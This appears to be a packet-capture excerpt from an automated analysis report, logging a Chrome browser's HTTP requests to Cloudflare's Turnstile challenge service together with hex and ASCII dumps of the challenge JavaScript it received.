                                                                                                                                                            2024-10-08 03:08:45 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                                                                                                            Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                                                                                                                            2024-10-08 03:08:45 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 2c 72 29 7b 76 61 72 20 61 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 61 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 6c 3d 21 31 2c 67 2c 66 3b 74 72 79 7b 66 6f 72 28 61 3d 61 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 61 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                                                                                                                                            Data Ascii: t(e){if(Array.isArray(e))return e}function Bt(e,r){var a=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(a!=null){var o=[],c=!0,l=!1,g,f;try{for(a=a.call(e);!(c=(g=a.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
                                                                                                                                                            2024-10-08 03:08:45 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 73 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 73 5b 30 5d 26 26 28 61 3d 30 29 29 2c 61 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 6c 3d 73 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 73 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 6c 3d 63 2e 72 65 74 75 72 6e 29 26 26 6c 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 6c 3d 6c 2e 63 61 6c 6c 28 63 2c 73 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 6c 3b 73 77 69 74 63 68 28 63 3d 30 2c 6c 26 26 28 73 3d 5b 73 5b 30 5d 26 32 2c 6c 2e 76 61 6c
                                                                                                                                                            Data Ascii: ])}}function p(s){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,s[0]&&(a=0)),a;)try{if(o=1,c&&(l=s[0]&2?c.return:s[0]?c.throw||((l=c.return)&&l.call(c),0):c.next)&&!(l=l.call(c,s[1])).done)return l;switch(c=0,l&&(s=[s[0]&2,l.val
                                                                                                                                                            2024-10-08 03:08:45 UTC1369INData Raw: 29 29 3b 76 61 72 20 56 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 56 65 7c 7c 28 56 65 3d 7b 7d 29 29 3b 76 61 72 20 53 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69 6c 75 72 65 2d 77 6f 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69 6c 75 72 65 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 3d 22 66 61 69 6c 75 72 65 2d 66 65 65 64 62 61 63 6b 22 2c 65 2e 46 41 49
                                                                                                                                                            Data Ascii: ));var Ve;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Ve||(Ve={}));var Se;(function(e){e.FAILURE_WO_HAVING_TROUBLES="failure-wo-having-troubles",e.FAILURE_HAVING_TROUBLES="failure-having-troubles",e.FAILURE_FEEDBACK="failure-feedback",e.FAI
                                                                                                                                                            2024-10-08 03:08:45 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 20 4c 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22 2c 22 6c 69 67 68 74 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 39 65 35 7d 66 75 6e 63 74 69 6f 6e 20 63 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 33 36 65 34 7d 76 61 72 20 41 72 3d 2f 5e 5b 30 2d 39 41 2d 5a 61 2d 7a 5f 2d 5d 7b 33 2c 31 30 30 7d 24 2f 3b 66 75 6e 63 74 69 6f 6e 20 58 74 28 65 29 7b 72 65 74 75 72 6e
                                                                                                                                                            Data Ascii: unction L(e,r){return e.indexOf(r)!==-1}function nt(e){return L(["auto","dark","light"],e)}function it(e){return L(["auto","never"],e)}function ot(e){return e>0&&e<9e5}function ct(e){return e>0&&e<36e4}var Ar=/^[0-9A-Za-z_-]{3,100}$/;function Xt(e){return
                                                                                                                                                            2024-10-08 03:08:45 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 79 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 5f 74 3d 22 67 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 22 2c 65 72 3d 38 65 33 2c 62 74 3d 22 70 72 69 76 61 74 65 2d 74 6f 6b 65 6e 22 2c 74 72 3d 33 2c 72 72 3d 35 30 30 2c 61 72 3d 35 30 30 2c 59 3d 22 30 2f 30 22 3b 76 61 72 20 43 72 3d 5b 22 62 67 2d 62 67 22 2c 22 64 61 2d 64 6b 22 2c 22 64 65 2d 64 65 22 2c 22 65 6c 2d 67 72 22 2c 22 6a 61 2d 6a 70 22 2c 22 6d 73 2d 6d 79 22 2c 22 72 75 2d 72 75 22 2c 22 73 6b 2d 73 6b 22 2c 22 73 6c 2d 73 69 22 2c 22 73 72 2d 62 61 22 2c 22 74 6c 2d 70 68 22 2c 22 75 6b 2d 75 61 22 5d 2c 4e 72 3d 5b 22 61 72 2d 65 67 22 2c 22 65 73 2d 65 73 22 2c 22 63 73 2d 63 7a
                                                                                                                                                            Data Ascii: allenge_response",yt="cf-turnstile-response",_t="g-recaptcha-response",er=8e3,bt="private-token",tr=3,rr=500,ar=500,Y="0/0";var Cr=["bg-bg","da-dk","de-de","el-gr","ja-jp","ms-my","ru-ru","sk-sk","sl-si","sr-ba","tl-ph","uk-ua"],Nr=["ar-eg","es-es","cs-cz
                                                                                                                                                            2024-10-08 03:08:45 UTC1369INData Raw: 72 46 65 65 64 62 61 63 6b 2c 6f 3d 65 2e 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3b 72 65 74 75 72 6e 20 61 26 26 72 3f 22 35 34 30 70 78 22 3a 61 26 26 6f 3f 22 35 30 30 70 78 22 3a 61 3f 22 34 38 30 70 78 22 3a 72 3f 22 36 35 30 70 78 22 3a 6f 3f 22 35 39 30 70 78 22 3a 22 35 37 30 70 78 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 48 65 28 65 29 7b 69 66 28 65 3d 3d 3d 76 6f 69 64 20 30 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 6e 72 28 65 2c 72 29 7b 69 66 28 21 55 28 65 2c
                                                                                                                                                            Data Ascii: rFeedback,o=e.isModeratelyVerbose;return a&&r?"540px":a&&o?"500px":a?"480px":r?"650px":o?"590px":"570px"};function He(e){if(e===void 0)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}function nr(e,r){if(!U(e,
                                                                                                                                                            2024-10-08 03:08:45 UTC1369INData Raw: 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 6f 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 74 79 70 65 6f 66 20 72 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 69 66 28 72 2e 68 61 73 28 6f 29 29 72 65 74 75 72 6e 20 72 2e 67 65 74 28 6f 29 3b 72 2e 73 65 74 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 72 65 74 75 72 6e 20 49 65 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 63 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 7d 72 65 74 75 72 6e 20
                                                                                                                                                            Data Ascii: f(o===null||!or(o))return o;if(typeof o!="function")throw new TypeError("Super expression must either be null or a function");if(typeof r!="undefined"){if(r.has(o))return r.get(o);r.set(o,c)}function c(){return Ie(o,arguments,ce(this).constructor)}return
                                                                                                                                                            2024-10-08 03:08:45 UTC1369INData Raw: 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d 7b 6c 6f 61 64 65 64 41 73 79 6e 63 3a 21 31 2c 70 61 72 61 6d 73 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 7d 3b 28 65 2e 61 73 79 6e 63 7c 7c 65 2e 64 65 66 65 72 29 26 26 28 72 2e 6c 6f 61 64 65 64 41 73 79 6e 63 3d 21 30 29 3b 76 61 72 20 61 3d 65 2e 73 72 63 2c 6f 3d 61 2e 73 70 6c 69 74 28 22 3f 22 29 3b 72 65 74 75 72 6e 20 6f 2e 6c 65 6e 67 74 68 3e 31 26 26 28 72 2e 70 61 72 61 6d 73 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 6f 5b 31 5d 29 29 2c 72 7d 66 75 6e 63 74 69 6f 6e 20 57 28 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 70
                                                                                                                                                            Data Ascii: ript tag, some features may not be available",43777);var r={loadedAsync:!1,params:new URLSearchParams};(e.async||e.defer)&&(r.loadedAsync=!0);var a=e.src,o=a.split("?");return o.length>1&&(r.params=new URLSearchParams(o[1])),r}function W(){return typeof p
                                                                                                                                                            2024-10-08 03:08:45 UTC1369INData Raw: 69 75 73 3d 22 35 70 78 22 2c 73 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 73 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 70 78 22 2c 73 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64 65 6e 22 2c 73 2e 73 74 79 6c 65 2e 6d 61 72 67 69 6e 3d 22 30 70 78 20 61 75 74 6f 22 3b 76 61 72 20 78 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 78 2e 69 64 3d 65 2b 22 2d 66 72 22 2c 78 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 67 29 2c 78 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 6c 6c 6f 77 22 2c 22 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 69 73 6f 6c 61 74 65 64 3b 20 66 75 6c 6c 73 63 72 65 65 6e 22 29 2c 78 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 61 6e 64
                                                                                                                                                            Data Ascii: ius="5px",s.style.left="0px",s.style.top="0px",s.style.overflow="hidden",s.style.margin="0px auto";var x=document.createElement("iframe");x.id=e+"-fr",x.setAttribute("src",g),x.setAttribute("allow","cross-origin-isolated; fullscreen"),x.setAttribute("sand


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            12192.168.2.549731104.18.94.414434124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:45 UTC730OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cf2ed9a6c2641de&lang=auto HTTP/1.1
                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Accept: */*
                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jm7z9/0x4AAAAAAAkfshsNV9pF8gSH/auto/fbE/normal/auto/
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-10-08 03:08:45 UTC301INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:45 GMT
                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                            Content-Length: 116513
                                                                                                                                                            Connection: close
                                                                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8cf2ed9fdcbe42f2-EWR
                                                                                                                                                            2024-10-08 03:08:45 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65
                                                                                                                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconce
                                                                                                                                                            2024-10-08 03:08:45 UTC1369INData Raw: 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70 69 72 65 64 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 69 6e 76 61 6c 69 64 5f 64 6f 6d 61 69 6e 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 64 6f 6d 61 69 6e 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25
                                                                                                                                                            Data Ascii: s%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_expired":"Expired","human_button_text":"Verify%20you%20are%20human","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%
                                                                                                                                                            2024-10-08 03:08:45 UTC1369INData Raw: 74 28 67 48 28 37 37 30 29 29 2f 31 31 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 48 28 38 33 38 29 29 2f 31 32 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 39 36 38 30 33 33 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 33 39 38 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 67 4a 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 4a 3d 67 49 2c 64 3d 7b 27 4d 51 5a 72 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 66 4a 67 47 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 74 68 4d
                                                                                                                                                            Data Ascii: t(gH(770))/11)+-parseInt(gH(838))/12,f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,968033),eM=this||self,eN=eM[gI(1398)],eO=function(gJ,d,e,f,g){return gJ=gI,d={'MQZry':function(h,i){return i==h},'fJgGV':function(h,i){return i==h},'thM
                                                                                                                                                            2024-10-08 03:08:45 UTC1369INData Raw: 65 74 75 72 6e 20 67 4c 3d 67 4b 2c 67 4c 28 31 36 31 34 29 5b 67 4c 28 34 35 30 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 67 4d 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 29 7b 69 66 28 67 4d 3d 67 4a 2c 64 5b 67 4d 28 31 33 38 32 29 5d 28 6e 75 6c 6c 2c 69 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 78 3d 7b 7d 2c 42 3d 7b 7d 2c 43 3d 27 27 2c 44 3d 32 2c 45 3d 33 2c 46 3d 32 2c 47 3d 5b 5d 2c 48 3d 30 2c 49 3d 30 2c 4a 3d 30 3b 64 5b 67 4d 28 33 30 32 29 5d 28 4a 2c 69 5b 67 4d 28 36 34 38 29 5d 29 3b 4a 2b 3d 31 29 69 66 28 4b 3d 69 5b 67 4d 28 34 35 30 29 5d 28 4a 29 2c 4f 62 6a 65 63 74 5b 67 4d 28 38 39 37 29 5d 5b 67 4d 28 35 34 30 29 5d 5b 67 4d 28 35 36 31 29 5d
                                                                                                                                                            Data Ascii: eturn gL=gK,gL(1614)[gL(450)](i)})},'g':function(i,j,o,gM,s,x,B,C,D,E,F,G,H,I,J,K,L,M){if(gM=gJ,d[gM(1382)](null,i))return'';for(x={},B={},C='',D=2,E=3,F=2,G=[],H=0,I=0,J=0;d[gM(302)](J,i[gM(648)]);J+=1)if(K=i[gM(450)](J),Object[gM(897)][gM(540)][gM(561)]
                                                                                                                                                            2024-10-08 03:08:45 UTC1369INData Raw: 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 73 3c 46 3b 48 3d 4d 7c 48 3c 3c 31 2e 34 32 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 67 4d 28 34 37 35 29 5d 28 64 5b 67 4d 28 34 31 35 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 67 4d 28 35 35 37 29 5d 28 30 29 2c 73 3d 30 3b 31 36 3e 73 3b 48 3d 64 5b 67 4d 28 31 36 30 38 29 5d 28 48 2c 31 29 7c 4d 26 31 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 67 4d 28 34 37 35 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 2d 2d 2c 64 5b 67 4d 28 37 34 34 29 5d 28 30 2c 44 29 26 26 28 44 3d 4d 61 74 68 5b 67 4d 28 35 36 34 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d
                                                                                                                                                            Data Ascii: );}else{for(M=1,s=0;s<F;H=M|H<<1.42,I==j-1?(I=0,G[gM(475)](d[gM(415)](o,H)),H=0):I++,M=0,s++);for(M=C[gM(557)](0),s=0;16>s;H=d[gM(1608)](H,1)|M&1,I==j-1?(I=0,G[gM(475)](o(H)),H=0):I++,M>>=1,s++);}D--,d[gM(744)](0,D)&&(D=Math[gM(564)](2,F),F++),delete B[C]
                                                                                                                                                            2024-10-08 03:08:45 UTC1369INData Raw: 67 50 28 34 36 33 29 5d 28 46 2c 4b 29 3b 4e 3d 48 26 47 2c 48 3e 3e 3d 31 2c 64 5b 67 50 28 31 35 33 34 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 46 2a 28 30 3c 4e 3f 31 3a 30 29 2c 46 3c 3c 3d 31 29 3b 4f 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 45 3d 73 5b 33 5d 3d 4f 2c 44 5b 67 50 28 34 37 35 29 5d 28 4f 29 3b 3b 29 7b 69 66 28 64 5b 67 50 28 32 33 31 29 5d 28 49 2c 69 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 50 28 35 36 34 29 5d 28 32 2c 43 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4e 3d 47 26 48 2c 48 3e 3e 3d 31 2c 64 5b 67 50 28 31 35 33 37 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 64 5b 67 50 28 35 32 38 29 5d 28 6f
                                                                                                                                                            Data Ascii: gP(463)](F,K);N=H&G,H>>=1,d[gP(1534)](0,H)&&(H=j,G=o(I++)),J|=F*(0<N?1:0),F<<=1);O=e(J);break;case 2:return''}for(E=s[3]=O,D[gP(475)](O);;){if(d[gP(231)](I,i))return'';for(J=0,K=Math[gP(564)](2,C),F=1;F!=K;N=G&H,H>>=1,d[gP(1537)](0,H)&&(H=j,G=d[gP(528)](o
                                                                                                                                                            2024-10-08 03:08:45 UTC1369INData Raw: 5e 3d 6a 5b 67 52 28 35 35 37 29 5d 28 6d 29 7d 29 2c 63 3d 65 4d 5b 67 51 28 31 31 39 36 29 5d 28 63 29 2c 69 3d 5b 5d 2c 67 3d 2d 31 3b 21 66 5b 67 51 28 35 36 30 29 5d 28 69 73 4e 61 4e 2c 6b 3d 63 5b 67 51 28 35 35 37 29 5d 28 2b 2b 67 29 29 3b 69 5b 67 51 28 34 37 35 29 5d 28 53 74 72 69 6e 67 5b 67 51 28 38 33 36 29 5d 28 66 5b 67 51 28 34 32 37 29 5d 28 28 6b 26 32 35 35 2e 32 38 29 2d 68 2d 66 5b 67 51 28 35 32 33 29 5d 28 67 2c 36 35 35 33 35 29 2b 36 35 35 33 35 2c 32 35 35 29 29 29 29 3b 72 65 74 75 72 6e 20 69 5b 67 51 28 39 30 34 29 5d 28 27 27 29 7d 2c 65 51 3d 5b 5d 2c 65 52 3d 30 3b 32 35 36 3e 65 52 3b 65 51 5b 65 52 5d 3d 53 74 72 69 6e 67 5b 67 49 28 38 33 36 29 5d 28 65 52 29 2c 65 52 2b 2b 29 3b 65 53 3d 28 30 2c 65 76 61 6c 29 28 67
                                                                                                                                                            Data Ascii: ^=j[gR(557)](m)}),c=eM[gQ(1196)](c),i=[],g=-1;!f[gQ(560)](isNaN,k=c[gQ(557)](++g));i[gQ(475)](String[gQ(836)](f[gQ(427)]((k&255.28)-h-f[gQ(523)](g,65535)+65535,255))));return i[gQ(904)]('')},eQ=[],eR=0;256>eR;eQ[eR]=String[gI(836)](eR),eR++);eS=(0,eval)(g
